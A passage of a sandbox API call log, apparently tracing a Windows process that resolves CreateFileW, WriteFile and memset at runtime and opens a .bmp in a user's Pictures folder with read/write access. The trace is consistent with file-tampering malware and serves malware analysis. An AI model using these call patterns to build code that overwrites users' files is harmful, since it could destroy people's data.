lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8ea490, ftCreationTime.dwHighDateTime=0x1d5da3a, ftLastAccessTime.dwLowDateTime=0xb4730110, ftLastAccessTime.dwHighDateTime=0x1d5e3b1, ftLastWriteTime.dwLowDateTime=0xb4730110, ftLastWriteTime.dwHighDateTime=0x1d5e3b1, nFileSizeHigh=0x0, nFileSizeLow=0x8f3a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="CNlXKQK1zNg.bmp", cAlternateFileName="CNLXKQ~1.BMP")) returned 0x90ae18 [0189.216] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0189.216] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0189.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0189.217] CharLowerBuffW (in: lpsz="byte[36666]", cchLength=0xb | out: lpsz="byte[36666]") returned 0xb [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0189.217] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0189.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0189.218] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0189.218] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0189.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0189.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0189.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0189.218] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0189.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0189.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.218] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0189.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0189.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0189.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x8e19f0 [0189.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x8e19f0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0189.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0189.219] FreeLibrary (hLibModule=0x75c90000) returned 1 [0189.219] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0189.219] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0189.219] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0189.219] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0189.219] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0189.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0189.220] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.220] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.220] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.220] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.220] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0189.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.221] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0189.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0189.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.221] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.221] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.221] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.221] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.221] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.222] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.222] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.222] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.222] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0189.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0189.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.223] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0189.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0189.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0189.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0189.223] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0189.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0189.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0189.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd8d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0189.223] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\cnlxkqk1zng.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0189.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0189.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0189.224] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.224] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0189.224] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0189.224] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0189.224] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0189.224] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0189.225] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0189.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0189.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0189.225] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0189.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0189.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd9c0 [0189.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd9c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0189.225] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.225] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0189.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0189.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0189.225] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0189.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.226] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0189.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.226] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0189.226] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0189.226] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0189.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0189.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0189.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0189.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0189.226] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0189.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0189.226] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0189.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0189.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0189.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fe8 [0189.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9fe8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0189.227] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.227] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0189.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0189.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.227] PeekMessageW (in: lpMsg=0x87f114, 